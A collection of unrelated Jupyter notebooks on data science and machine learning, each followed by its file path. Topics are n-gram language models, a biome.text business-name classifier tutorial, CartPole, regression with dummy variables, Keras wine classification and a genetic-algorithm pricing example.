new_test = sum([['<s>'] + x + ['</s>'] for x in test_corpus])
print(test_corpus)
print("\n#####\n")
print(new_test)
# -
reload(lab3);
# +
n_gram_orders = [2, 3]
train_corpus = natr_corpus_tk[:int(0.8*len(natr_corpus_tk))]
test_corpus = natr_corpus_tk[int(0.8*len(natr_corpus_tk)): int(0.85*len(natr_corpus_tk))]
results = lab3.vary_ngram(train_corpus, test_corpus, n_gram_orders)
print(results)
# -
# However, we notice that the 3-gram language model actually performs worse than the 2-gram language model. This is due to the small size of the training corpus. A 3-gram language model is actually too complex of a model for a small training size. If our training data was larger, we would be seeing the opposite. If we trained 1-gram, 2-gram, and 3-gram models on 38 million words from the Wall Street Journal, we will get perplexity of 962, 170, 109 respectively on a test set of 1.5 million words.
defaultdict(None, {2: 5596.7318534048245, 3: 5625.390747181811})
# Now let's see a few examples of top frequent n-gram examples. Let's start with unigram.
# +
natr_ngrams, natr_vocab = lab3.count_ngrams(natr_corpus_tr, 3)
top_ngram = []
count = 0
for i in sorted(natr_ngrams.items(), key=lambda x: x[1], reverse=True):
if len(i[0]) == 1:
top_ngram.append(i[0])
count += 1
if count >=20:
break
print(top_ngram)
# -
# Do you think unigram captures any grammatical information? How well do you think unigram captures the language information?
#
# Now let's see bigram and trigram.
# +
top_ngram = []
count = 0
for i in sorted(natr_ngrams.items(), key=lambda x: x[1], reverse=True):
if len(i[0]) == 2:
top_ngram.append(i[0])
count += 1
if count >=20:
break
print(top_ngram)
top_ngram = []
count = 0
for i in sorted(natr_ngrams.items(), key=lambda x: x[1], reverse=True):
if len(i[0]) == 3:
top_ngram.append(i[0])
count += 1
if count >=20:
break
print(top_ngram)
# -
# Compared with unigram, bigram and trigram can capture more information.
# Bigram language model can already capture some of the grammatical information, such as 'in the', 'of the'. However, the power of bigram is still limited.
# The trigram can output more adequate short phrases such as 'ounces of gold', 'The company said', 'oil and gas'.
#
# Therefore, typically the n-gram model with a larger n contains more information about the word sequence and thus, has lower perplexity. However, the tradeoff is the computational efficiency and memory.
|
ECE365/nlp/nlplab3_dist/NLPLab3.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Training a short text classifier of German business names
# <a target="_blank" href="https://www.recogn.ai/biome-text/master/documentation/tutorials/1-Training_a_text_classifier.html"><img class="icon" src="https://www.recogn.ai/biome-text/master/assets/img/biome-isotype.svg" width=24 /></a>
# [View on recogn.ai](https://www.recogn.ai/biome-text/master/documentation/tutorials/1-Training_a_text_classifier.html)
#
# <a target="_blank" href="https://colab.research.google.com/github/recognai/biome-text/blob/master/docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb"><img class="icon" src="https://www.tensorflow.org/images/colab_logo_32px.png" width=24 /></a>
# [Run in Google Colab](https://colab.research.google.com/github/recognai/biome-text/blob/master/docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb)
#
# <a target="_blank" href="https://github.com/recognai/biome-text/blob/master/docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb"><img class="icon" src="https://github.githubassets.com/images/modules/logos_page/GitHub-Mark.png" width=24 /></a>
# [View source on GitHub](https://github.com/recognai/biome-text/blob/master/docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb)
# When running this tutorial in Google Colab, make sure to install *biome.text* first:
# !pip install -U pip
# !pip install -U git+https://github.com/recognai/biome-text.git
exit(0) # Force restart of the runtime
# *If* you want to log your runs with [WandB](https://wandb.ai/home), don't forget to install its client and log in.
# !pip install wandb
# !wandb login
# ## Introduction
#
# In this tutorial we will train a basic short-text classifier for predicting the sector of a business based only on its business name.
# For this we will use a training data set with business names and business categories in German.
# ### Imports
#
# Let us first import all the stuff we need for this tutorial:
from biome.text import Pipeline, Dataset, Trainer
from biome.text.configuration import VocabularyConfiguration, WordFeatures, TrainerConfiguration
# ## Explore the training data
#
# Let's take a look at the data we will use for training. For this we will use the [`Dataset`](https://www.recogn.ai/biome-text/master/api/biome/text/dataset.html#dataset) class that is a very thin wrapper around HuggingFace's awesome [datasets.Dataset](https://huggingface.co/docs/datasets/master/package_reference/main_classes.html#datasets.Dataset).
# We will download the data first to create `Dataset` instances.
#
# Apart from the training data we will also download an optional validation data set to estimate the generalization error.
# Downloading the dataset first
# !curl -O https://biome-tutorials-data.s3-eu-west-1.amazonaws.com/text_classifier/business.cat.train.csv
# !curl -O https://biome-tutorials-data.s3-eu-west-1.amazonaws.com/text_classifier/business.cat.valid.csv
# Loading from local
train_ds = Dataset.from_csv("business.cat.train.csv")
valid_ds = Dataset.from_csv("business.cat.valid.csv")
# Most of HuggingFace's `Dataset` API is exposed and you can checkout their nice [documentation](https://huggingface.co/docs/datasets/master/processing.html) on how to work with data in a `Dataset`. For example, let's quickly check the size of our training data and print the first 10 examples as a pandas DataFrame:
len(train_ds)
train_ds.head()
# As we can see we have two relevant columns *label* and *text*. Our classifier will be trained to predict the *label* given the *text*.
# ::: tip Tip
#
# The [TaskHead](https://www.recogn.ai/biome-text/master/api/biome/text/modules/heads/task_head.html#taskhead) of our model below will expect a *text* and a *label* column to be present in the `Dataset`. In our data set this is already the case, otherwise we would need to change or map the corresponding column names via `Dataset.rename_column_()` or `Dataset.map()`.
#
# :::
# We can also quickly check the distribution of our labels. Use `Dataset.head(None)` to return the complete data set as a pandas DataFrame:
train_ds.head(None)["label"].value_counts()
# The `Dataset` class also provides access to Hugging Face's extensive NLP datasets collection via the `Dataset.load_dataset()` method. Have a look at their [quicktour](https://huggingface.co/docs/datasets/master/quicktour.html) for more details about their awesome library.
# ## Configure your *biome.text* Pipeline
# A typical [Pipeline](https://www.recogn.ai/biome-text/master/api/biome/text/pipeline.html#pipeline) consists of tokenizing the input, extracting features, applying a language encoding (optionally) and executing a task-specific head in the end.
#
# After training a pipeline, you can use it to make predictions.
#
# As a first step we must define a configuration for our pipeline.
# In this tutorial we will create a configuration dictionary and use the `Pipeline.from_config()` method to create our pipeline, but there are [other ways](https://www.recogn.ai/biome-text/master/api/biome/text/pipeline.html#pipeline).
#
# A *biome.text* pipeline has the following main components:
#
# ```yaml
# name: # a descriptive name of your pipeline
#
# tokenizer: # how to tokenize the input
#
# features: # input features of the model
#
# encoder: # the language encoder
#
# head: # your task configuration
#
# ```
#
# See the [Configuration section](https://www.recogn.ai/biome-text/master/documentation/user-guides/2-configuration.html) for a detailed description of how these main components can be configured.
#
# Our complete configuration for this tutorial will be following:
pipeline_dict = {
"name": "german_business_names",
"tokenizer": {
"text_cleaning": {
"rules": ["strip_spaces"]
}
},
"features": {
"word": {
"embedding_dim": 64,
"lowercase_tokens": True,
},
"char": {
"embedding_dim": 32,
"lowercase_characters": True,
"encoder": {
"type": "gru",
"num_layers": 1,
"hidden_size": 32,
"bidirectional": True,
},
"dropout": 0.1,
},
},
"head": {
"type": "TextClassification",
"labels": train_ds.unique("label"),
"pooler": {
"type": "gru",
"num_layers": 1,
"hidden_size": 32,
"bidirectional": True,
},
"feedforward": {
"num_layers": 1,
"hidden_dims": [32],
"activations": ["relu"],
"dropout": [0.0],
},
},
}
# With this dictionary we can now create a `Pipeline`:
pl = Pipeline.from_config(pipeline_dict)
# ## Configure the vocabulary
#
# The default behavior of *biome.text* is to add all tokens from the training data set to the pipeline's vocabulary.
# This is done automatically when training the pipeline for the first time.
#
# If you want to have more control over this step, you can define a `VocabularyConfiguration` and pass it to the [`Trainer`](https://www.recogn.ai/biome-text/master/api/biome/text/trainer.html) later on.
# In our business name classifier we only want to include words with a general meaning to our word feature vocabulary (like "Computer" or "Autohaus", for example), and want to exclude specific names that will not help to generally classify the kind of business.
# This can be achieved by including only the most frequent words in our training set via the `min_count` argument. For a complete list of available arguments see the [VocabularyConfiguration API](https://www.recogn.ai/biome-text/master/api/biome/text/configuration.html#vocabularyconfiguration).
vocab_config = VocabularyConfiguration(min_count={WordFeatures.namespace: 20})
# ## Configure the trainer
#
# As a next step we have to configure the [`Trainer`](https://www.recogn.ai/biome-text/master/api/biome/text/trainer.html), which in essentially is a light wrapper around the amazing [Pytorch Lightning Trainer](https://pytorch-lightning.readthedocs.io/en/latest/common/trainer.html).
#
# The default trainer has sensible defaults and should work alright for most of your cases.
# In this tutorial, however, we want to tune a bit the learning rate and limit the training time to three epochs only.
# We also want to modify the monitored validation metric (by default it is the `validation_loss`) that is used to rank the checkpoints, as well as for the early stopping mechanism and to load the best model weights at the end of the training.
# For a complete list of available arguments see the [TrainerConfiguration API](https://www.recogn.ai/biome-text/master/api/biome/text/configuration.html#trainerconfiguration).
#
# ::: tip Tip
#
# By default we will use a CUDA device if one is available. If you prefer not to use it, just set `gpus=0` in the `TrainerConfiguration`.
#
# :::
#
# ::: tip Tip
#
# The default [WandB](https://wandb.ai/site) logger will log the runs to the "biome" project.
# You can easily change this by setting the `WANDB_PROJECT` env variable:
# ```python
# import os
# os.environ["WANDB_PROJECT"] = "my_project"
# ```
#
# :::
trainer_config = TrainerConfiguration(
optimizer={
"type": "adam",
"lr": 0.01,
},
max_epochs=3,
monitor="validation_accuracy",
monitor_mode="max"
)
# ## Train your model
#
# Now we have everything ready to start the training of our model:
# - training data set
# - pipeline
# - trainer configuration
#
# In a fist step we have to create a `Trainer` instance and pass in the pipeline, the training/validation data, the trainer configuration and our vocabulary configuration.
# This will load the data into memory (unless you specify `layz=True`) and build the vocabulary.
trainer = Trainer(
pipeline=pl,
train_dataset=train_ds,
valid_dataset=valid_ds,
trainer_config=trainer_config,
vocab_config=vocab_config,
)
# In a second step we simply have to call the `Trainer.fit()` method to start the training.
# By default, at the end of the training the trained pipeline and the training metrics will be saved in a folder called `output`.
# The trained pipeline is saved as a `model.tar.gz` file that contains the pipeline configuration, the model weights and the vocabulary.
# The metrics are saved to a `metrics.json` file.
#
# During the training the `Trainer` will also create a logging folder called `training_logs` by default.
# You can modify this path via the `default_root_dir` option in your `TrainerConfiguration`, that also supports remote addresses such as s3 or hdfs.
# This logging folder contains all your checkpoints and logged metrics, like the ones logged for [TensorBoard](https://www.tensorflow.org/tensorboard/) for example.
trainer.fit()
# After 3 epochs we achieve a validation accuracy of about 0.91.
# The validation loss seems to be decreasing further, though, so we could probably train the model for a few more epochs without overfitting the training data.
# For this we could simply reinitialize the `Trainer` and call `Trainer.fit(exist_ok=True)` again.
#
# ::: tip Tip
#
# If for some reason the training gets interrupted, you can continue from the last saved checkpoint by setting the `resume_from_checkpoint` option in the `TrainerConfiguration`.
#
# :::
#
# ::: tip Tip
#
# If you receive warnings about the data loader being a bottleneck, try to increase the `num_workers_for_dataloader` parameter in the `TrainerConfiguration` (up to the number of cpus on your machine).
#
# :::
# ## Make your first predictions
# Now that we trained our model we can go on to make our first predictions.
# We provide the input expected by our `TaskHead` of the model to the `Pipeline.predict()` method.
# In our case it is a `TextClassification` head that classifies a `text` input:
# + nbreg={"diff_ignore": ["/outputs/*"]}
pl.predict(text="Autohaus biome.text")
# -
# The output of the `Pipeline.predict()` method is a dictionary with a `labels` and `probabilities` key containing a list of labels and their corresponding probabilities, ordered from most to less likely.
# ::: tip Tip
#
# When configuring the pipeline in the first place, we recommend to check that it is correctly setup by using the `predict` method.
# Since the pipeline is still not trained at that moment, the predictions will be arbitrary.
#
# :::
# We can also load the trained pipeline from the training output. This is useful in case you trained the pipeline in some earlier session, and want to continue your work with the inference steps:
pl_trained = Pipeline.from_pretrained("output/model.tar.gz")
# + [markdown] pycharm={"name": "#%% md\n"}
#
|
docs/docs/documentation/tutorials/1-Training_a_text_classifier.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import gym
import numpy as np
gym.__version__
# +
RUNS = 1000
steps = list()
rewards = list()
for i in range(RUNS):
env = gym.make("CartPole-v0")
total_reward = 0.0
total_steps = 0
obs = env.reset()
while True:
action = env.action_space.sample()
obs, reward, done, _ = env.step(action)
total_reward += reward
total_steps += 1
if done:
break
steps.append(total_steps)
rewards.append(total_reward)
#print("[%d/%d]\tEpisode done in %d steps, total reward %.2f" % (i+1, RUNS, total_steps, total_reward))
print("Average steps: %d\nAverage reward: %.2f" % (np.mean(steps), np.mean(rewards)))
# -
|
ReinforcementLearning/Cartpole - random.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import scipy as sp
import scipy.stats
import statsmodels.api as sm
# # <font face="gotham" color="purple"> ANOVA </font>
# If you have studied statistics, you certainly know the famous **Analysis of Variance** (ANOVA), you can skip this section, but if you haven't, read on.
#
# Simply speaking, the ANOVA is a technique of comparing means of multiple$(\geq 3)$ populations, the name derives from the way how calculations are performed.
#
# For example, a common hypotheses of ANOVA are
# $$
# H_0:\quad \mu_1=\mu_2=\mu_3=\cdots=\mu_n\\
# H_1:\quad \text{At least two means differ}
# $$
# In order to construct $F$-statistic, we need to introduce two more statistics, the first one is **Mean Square for Treatments** (MST), $\bar{\bar{x}}$ is the grand mean, $\bar{x}_i$ is the sample mean of sample $x_i$, $n_i$ is the number of observable in sample $i$
# $$
# MST=\frac{SST}{k-1},\qquad\text{where } SST=\sum_{i=1}^kn_i(\bar{x}_i-\bar{\bar{x}})^2
# $$
# And the second one is **Mean Square for Error** (MSE), $s_i$ is the sample variance of sample $i$
# $$
# MSE=\frac{SSE}{n-k},\qquad\text{where } SSE =(n_1-1)s_1^2+(n_2-1)s_2^2+\cdots+(n_k-1)s_k^2
# $$
# Join them together, an $F$-statistic is constructed
# $$
# F=\frac{MST}{MSE}
# $$
# If the $F$-statistic is larger than critical value with its corresponding degree of freedom, we reject null hypothesis.
# # <font face="gotham" color="purple"> Dummy Variable </font>
# Here's dataset with dummy variables, which are either $1$ or $0$.
df = pd.read_excel('Basic_Econometrics_practice_data.xlsx', sheet_name = 'Hight_ANOVA')
df
# The dataset has five columns, the first column $Height$ is a sample of $88$ male height, other columns are dummy variables indication its qualitative feature, here is the nationality.
#
# There are $4$ countries in the sample, Japan, Netherlands, Denmark and Finland, however there are only $3$ dummies in the data set, this is to avoid _perfect multicollinearity_, which is also called **dummy variable trap**, because the height data is the perfect linear combination of four dummy variables.
#
# If we use the model with only dummy variables as independent variable, we basically regressing a ANOVA model, i.e.
# $$
# Y_{i}=\beta_{1}+\beta_{2} D_{2 i}+\beta_{3 i} \mathrm{D}_{3 i}+\beta_{3 i} \mathrm{D}_{3 i}+u_{i}
# $$
# where $Y_i =$ the male height, $D_{2i}=1$ if the male is from Netherlands, $D_{3i}=1$ if the male is from Denmark and $D_{4i}=1$ if the male is from Finland. Japan doesn't have a dummy variable, so we are using it as reference, which will be clearer later.
#
# Now we run the regression and print the result. And how do we interpret the estimated coefficients?
# +
X = df[[ 'NL_dummpy', 'DM_dummpy', 'FI_dummy']]
Y = df['Height']
X = sm.add_constant(X) # adding a constant
model = sm.OLS(Y, X).fit()
print_model = model.summary()
print(print_model)
# -
# First, all the $p$-value are significantly small, so our estimation is valid. Then we examine the coefficients one by one.
#
# The estimated constant $b_1 = 163.03$ is the mean height of Japanese male. The mean of Dutch male height is $b_1+b_2 = 163.03+17.71=180.74$, the mean of Danish male height is $b_1+b_3=163.03+12.21=175.24$, the mean of Finnish male height is $b_1+b_4=163.03+12.85=175.88$.
#
# As you can see, the Japanese male height is used as a _reference_, also called _base category_, rest are added onpon it.
# This regression has the same effect as ANOVA test, all dummy coefficients are significant and so is $F$-statistic, which means we reject null height null hypothesis that all countries' male height are the same.
# # <font face="gotham" color="purple"> The ANCOVA Models </font>
# The example in the last section has only dummies in the independent variables, which is rare in practice. The more common situation is that independent variables have both quantitative and qualitative/dummy variables, and this is what we will do in this section.
#
# The model with both quantitative and qualitative variables are called **analysis of covariance** (ANCOVA) models. We have another dataset that contains the individual's parents' height.
# +
df = pd.read_excel('Basic_Econometrics_practice_data.xlsx', sheet_name = 'Hight_ANCOVA')
X = df[['Height of Father', 'Height of Mother','NL_dummy', 'DM_dummy', 'FI_dummy']]
Y = df['Height']
X = sm.add_constant(X) # adding a constant
model = sm.OLS(Y, X).fit()
print_model = model.summary()
print(print_model)
# -
# In order to interpret the results, let's type the estimated model here
# $$
# \hat{Y}= 27.87+.33 X_{f} + .5 X_{m} + 5.36 D_{NL} + 2.90 D_{DM} + 1.02 D_{FI}
# $$
# where $X_{f}$ and $X_{m}$ are father's and mother's heights, $D$'s are dummy variables representing each country.
# This is actually a function to predict a male's height if you input parents height, for instance if we set $D_{NL} = D_{DM}= D_{FI}=0 $, the function of height of Japanese male is
# $$
# \hat{Y}= 27.87+.33 X_{f} + .5 X_{m}
# $$
# Or the function of Dutch male height with $D_{NL} = 1$ and $ D_{DM}= D_{FI}=0$
# $$
# \hat{Y}= 27.87+.33 X_{f} + .5 X_{m} + 5.36
# $$
# With these results, we can define Python functions to predict male height
def jp_height(fh, mh):
return 27.87 + fh*.33 + mh*.5
def nl_height(fh, mh):
return 27.87 + fh*.33 + mh*.5 + 5.36
# A function to predict a Japanese male's height
jp_height(175, 170)
# And function to predict a Dutch male's height
nl_height(185, 185)
# # <font face="gotham" color="purple"> Slope Dummy Variables </font>
# What we have discussed above are all **intercept dummy variables** which means the dummy variable only change the intercept term, however, there are dummies which imposed on slope variables too.
#
# Back to the height example, what if we suspect that parents' height in NL could have more marginal effect on their sons' height, i.e. the model is
# $$
# Y= \beta_1 + \beta_2D_{NL} + (\beta_3+ \beta_4D_{NL})X_{f} + (\beta_5+ \beta_6D_{NL})X_{m}+u
# $$
# Rewrite for estimation purpose
# $$
# Y= \beta_1 + \beta_2D_{NL} + \beta_3 X_f + \beta_4 D_{NL}X_f + \beta_5X_m + \beta_6 D_{NL}X_m+u
# $$
# Take a look at our data, we need to reconstruct it
df.head()
# Drop the dummies of Denmark and Finland
df_NL = df.drop(['DM_dummy', 'FI_dummy'], axis=1); df_NL.head()
# Also create the column of multiplication of $D_{NL} \cdot X_f$ and $D_{NL}\cdot X_m$, then construct independent variable matrix and dependent variable
df_NL['D_NL_Xf'] = df_NL['Height of Father']*df_NL['NL_dummy']
df_NL['D_NL_Xm'] = df_NL['Height of Mother']*df_NL['NL_dummy']
X = df_NL[['NL_dummy', 'Height of Father', 'D_NL_Xf', 'Height of Mother', 'D_NL_Xm']]
Y = df['Height']
# +
X = sm.add_constant(X) # adding a constant
model = sm.OLS(Y, X).fit()
print_model = model.summary()
print(print_model)
# -
# Here's the estimated regression model
# $$
# \hat{Y}= 11.7747 + 120.9563D_{NL} + 0.3457 X_f - 0.0946 D_{NL}X_f + 0.5903X_m -0.5746 D_{NL}X_m
# $$
# If $D_{NL}=1$ then
# $$
# \hat{Y}= 132.731+0.2511X_f -0.01X_m
# $$
# Again, we define a Python function to predict Dutch male height based on their parents' height
def nl_height_marginal(fh, mh):
return 132.731 + fh*.2511 + mh*0.0157
nl_height_marginal(185, 180)
# Prediction seem quite logical.
#
# However, as you can see from the results, the hypotheses test rejects our theory that Dutch parents could influence their sons' marginal height, i.e. coefficients of $D_{NL} \cdot X_f$ and $D_{NL}\cdot X_m$ fail to reject null hypothesis with $5\%$ significance level.
|
4. Dummy Variable.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Gradient Descent
import numpy as np
import pandas as pd
# %matplotlib inline
import matplotlib.pyplot as plt
# ### Exercise 1
#
# You've just been hired at a wine company and they would like you to help them build a model that predicts the quality of their wine based on several measurements. They give you a dataset with wine
#
# - Load the ../data/wines.csv into Pandas
# - Use the column called "Class" as target
# - Check how many classes are there in target, and if necessary use dummy columns for a multi-class classification
# - Use all the other columns as features, check their range and distribution (using seaborn pairplot)
# - Rescale all the features using either MinMaxScaler or StandardScaler
# - Build a deep model with at least 1 hidden layer to classify the data
# - Choose the cost function, what will you use? Mean Squared Error? Binary Cross-Entropy? Categorical Cross-Entropy?
# - Choose an optimizer
# - Choose a value for the learning rate, you may want to try with several values
# - Choose a batch size
# - Train your model on all the data using a `validation_split=0.2`. Can you converge to 100% validation accuracy?
# - What's the minumum number of epochs to converge?
# - Repeat the training several times to verify how stable your results are
df = pd.read_csv('../data/wines.csv')
df.head()
y = df['Class']
y.value_counts()
y_cat = pd.get_dummies(y)
y_cat.head()
X = df.drop('Class', axis=1)
X.shape
import seaborn as sns
sns.pairplot(df, hue='Class')
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
Xsc = sc.fit_transform(X)
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense
from tensorflow.keras.optimizers import SGD, Adam, Adadelta, RMSprop
import tensorflow.keras.backend as K
# +
K.clear_session()
model = Sequential()
model.add(Dense(5, input_shape=(13,),
kernel_initializer='he_normal',
activation='relu'))
model.add(Dense(3, activation='softmax'))
model.compile(RMSprop(learning_rate=0.1),
'categorical_crossentropy',
metrics=['accuracy'])
model.fit(Xsc, y_cat.values,
batch_size=8,
epochs=10,
verbose=1,
validation_split=0.2)
# -
# ### Exercise 2
#
# Since this dataset has 13 features we can only visualize pairs of features like we did in the Paired plot. We could however exploit the fact that a neural network is a function to extract 2 high level features to represent our data.
#
# - Build a deep fully connected network with the following structure:
# - Layer 1: 8 nodes
# - Layer 2: 5 nodes
# - Layer 3: 2 nodes
# - Output : 3 nodes
# - Choose activation functions, inizializations, optimizer and learning rate so that it converges to 100% accuracy within 20 epochs (not easy)
# - Remember to train the model on the scaled data
# - Define a Feature Function like we did above between the input of the 1st layer and the output of the 3rd layer
# - Calculate the features and plot them on a 2-dimensional scatter plot
# - Can we distinguish the 3 classes well?
#
# +
K.clear_session()
model = Sequential()
model.add(Dense(8, input_shape=(13,),
kernel_initializer='he_normal', activation='tanh'))
model.add(Dense(5, kernel_initializer='he_normal', activation='tanh'))
model.add(Dense(2, kernel_initializer='he_normal', activation='tanh'))
model.add(Dense(3, activation='softmax'))
model.compile(RMSprop(learning_rate=0.05),
'categorical_crossentropy',
metrics=['accuracy'])
model.fit(Xsc, y_cat.values,
batch_size=16,
epochs=20,
verbose=1)
# -
model.summary()
inp = model.layers[0].input
out = model.layers[2].output
features_function = K.function([inp], [out])
features = features_function([Xsc])[0]
features.shape
plt.scatter(features[:, 0], features[:, 1], c=y)
# ### Exercise 3
#
# Keras functional API. So far we've always used the Sequential model API in Keras. However, Keras also offers a Functional API, which is much more powerful. You can find its [documentation here](https://keras.io/getting-started/functional-api-guide/). Let's see how we can leverage it.
#
# - define an input layer called `inputs`
# - define two hidden layers as before, one with 8 nodes, one with 5 nodes
# - define a `second_to_last` layer with 2 nodes
# - define an output layer with 3 nodes
# - create a model that connect input and output
# - train it and make sure that it converges
# - define a function between inputs and second_to_last layer
# - recalculate the features and plot them
from tensorflow.keras.layers import Input
from tensorflow.keras.models import Model
# +
K.clear_session()
inputs = Input(shape=(13,))
x = Dense(8, kernel_initializer='he_normal', activation='tanh')(inputs)
x = Dense(5, kernel_initializer='he_normal', activation='tanh')(x)
second_to_last = Dense(2, kernel_initializer='he_normal',
activation='tanh')(x)
outputs = Dense(3, activation='softmax')(second_to_last)
model = Model(inputs=inputs, outputs=outputs)
model.compile(RMSprop(learning_rate=0.05),
'categorical_crossentropy',
metrics=['accuracy'])
model.fit(Xsc, y_cat.values, batch_size=16, epochs=20, verbose=1)
# -
features_function = K.function([inputs], [second_to_last])
features = features_function([Xsc])[0]
plt.scatter(features[:, 0], features[:, 1], c=y)
# ## Exercise 4
#
# Keras offers the possibility to call a function at each epoch. These are Callbacks, and their [documentation is here](https://keras.io/callbacks/). Callbacks allow us to add some neat functionality. In this exercise we'll explore a few of them.
#
# - Split the data into train and test sets with a test_size = 0.3 and random_state=42
# - Reset and recompile your model
# - train the model on the train data using `validation_data=(X_test, y_test)`
# - Use the `EarlyStopping` callback to stop your training if the `val_loss` doesn't improve
# - Use the `ModelCheckpoint` callback to save the trained model to disk once training is finished
# - Use the `TensorBoard` callback to output your training information to a `/tmp/` subdirectory
# - Watch the next video for an overview of tensorboard
from tensorflow.keras.callbacks import ModelCheckpoint, EarlyStopping, TensorBoard
checkpointer = ModelCheckpoint(filepath="/tmp/udemy/weights.hdf5",
verbose=1, save_best_only=True)
earlystopper = EarlyStopping(monitor='val_loss', min_delta=0,
patience=1, verbose=1, mode='auto')
tensorboard = TensorBoard(log_dir='/tmp/udemy/tensorboard/')
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(Xsc, y_cat.values,
test_size=0.3,
random_state=42)
# +
K.clear_session()
inputs = Input(shape=(13,))
x = Dense(8, kernel_initializer='he_normal', activation='tanh')(inputs)
x = Dense(5, kernel_initializer='he_normal', activation='tanh')(x)
second_to_last = Dense(2, kernel_initializer='he_normal',
activation='tanh')(x)
outputs = Dense(3, activation='softmax')(second_to_last)
model = Model(inputs=inputs, outputs=outputs)
model.compile(RMSprop(learning_rate=0.05), 'categorical_crossentropy',
metrics=['accuracy'])
model.fit(X_train, y_train, batch_size=32,
epochs=20, verbose=2,
validation_data=(X_test, y_test),
callbacks=[checkpointer, earlystopper, tensorboard])
# -
# Run Tensorboard with the command:
#
# tensorboard --logdir /tmp/udemy/tensorboard/
#
# and open your browser at http://localhost:6006
|
solutions/5 Gradient Descent Exercises Solution.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Code source: Yarpiz (https://yarpiz.com/)
# real-valued GA
import numpy as np
from ypstruct import structure
import matplotlib.pyplot as plt
# run Genetic Algorithm
def run(problem, params):
# Problem Information
costfunc = problem.costfunc
nvar = problem.nvar
varmin = problem.varmin
varmax = problem.varmax
# Parameters
maxit = params.maxit
npop = params.npop
beta = params.beta
pc = params.pc
nc = int(np.round(pc*npop/2)*2)
gamma = params.gamma
mu = params.mu
sigma = params.sigma
# Empty Individual Template
empty_individual = structure()
empty_individual.position = None
empty_individual.cost = None
# Best Solution Ever Found
bestsol = empty_individual.deepcopy()
bestsol.cost = np.inf
# Initialize Population
pop = empty_individual.repeat(npop)
for i in range(npop):
pop[i].position = np.random.uniform(varmin, varmax, nvar)
pop[i].cost = costfunc(pop[i].position)
if pop[i].cost < bestsol.cost:
bestsol = pop[i].deepcopy()
# Best Cost of Iterations
bestcost = np.empty(maxit)
# Main Loop
for it in range(maxit):
costs = np.array([x.cost for x in pop])
avg_cost = np.mean(costs)
if avg_cost != 0:
costs = costs/avg_cost
probs = np.exp(-beta*costs)
popc = []
for _ in range(nc//2):
# Select Parents
#q = np.random.permutation(npop)
#p1 = pop[q[0]]
#p2 = pop[q[1]]
# Perform Roulette Wheel Selection
p1 = pop[roulette_wheel_selection(probs)]
p2 = pop[roulette_wheel_selection(probs)]
# Perform Crossover
c1, c2 = crossover(p1, p2, gamma)
# Perform Mutation
c1 = mutate(c1, mu, sigma)
c2 = mutate(c2, mu, sigma)
# Apply Bounds
apply_bound(c1, varmin, varmax)
apply_bound(c2, varmin, varmax)
# Evaluate First Offspring
c1.cost = costfunc(c1.position)
if c1.cost < bestsol.cost:
bestsol = c1.deepcopy()
# Evaluate Second Offspring
c2.cost = costfunc(c2.position)
if c2.cost < bestsol.cost:
bestsol = c2.deepcopy()
# Add Offsprings to popc
popc.append(c1)
popc.append(c2)
# Merge, Sort and Select
pop += popc
pop = sorted(pop, key=lambda x: x.cost)
pop = pop[0:npop]
# Store Best Cost
bestcost[it] = bestsol.cost
# Show Iteration Information
print("Iteration {}: Best Cost = {}".format(it, bestcost[it]))
# Output
out = structure()
out.pop = pop
out.bestsol = bestsol
print("Best solution: ", bestsol.position)
out.bestcost = bestcost
return out
# perform single-point crossover
def crossover(p1, p2, gamma=0.1):
c1 = p1.deepcopy()
c2 = p1.deepcopy()
alpha = np.random.uniform(-gamma, 1+gamma, *c1.position.shape)
c1.position = alpha*p1.position + (1-alpha)*p2.position
c2.position = alpha*p2.position + (1-alpha)*p1.position
return c1, c2
# apply mutation
def mutate(x, mu, sigma):
y = x.deepcopy()
flag = np.random.rand(*x.position.shape) <= mu
ind = np.argwhere(flag)
y.position[ind] += sigma*np.random.randn(*ind.shape)
return y
# apply boundary constraints
def apply_bound(x, varmin, varmax):
x.position = np.maximum(x.position, varmin)
x.position = np.minimum(x.position, varmax)
# roulette wheel selection
def roulette_wheel_selection(p):
c = np.cumsum(p)
r = sum(p)*np.random.rand()
ind = np.argwhere(r <= c)
return ind[0][0]
# +
# Fitness function
def bike_pricing(X):
return sum([-200*(X**2), 92000*X, -8400000])
# Problem Definition
problem = structure()
problem.costfunc = bike_pricing
problem.nvar = 1
problem.varmin = [50]
problem.varmax = [350]
# +
# Solver
# GA Parameters
params = structure()
params.maxit = 200
params.npop = 5
params.beta = 1
params.pc = 1
params.gamma = 0.1
params.mu = 0.01
params.sigma = 0.1
# Run GA
out = run(problem, params)
# -
# Results
plt.plot(out.bestcost)
# plt.semilogy(out.bestcost)
plt.xlim(0, params.maxit)
plt.xlabel('Iterations')
plt.ylabel('Best Cost')
plt.title('Genetic Algorithm (GA)')
plt.grid(True)
plt.show()
|
bike_pricing_real_valued_GA.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
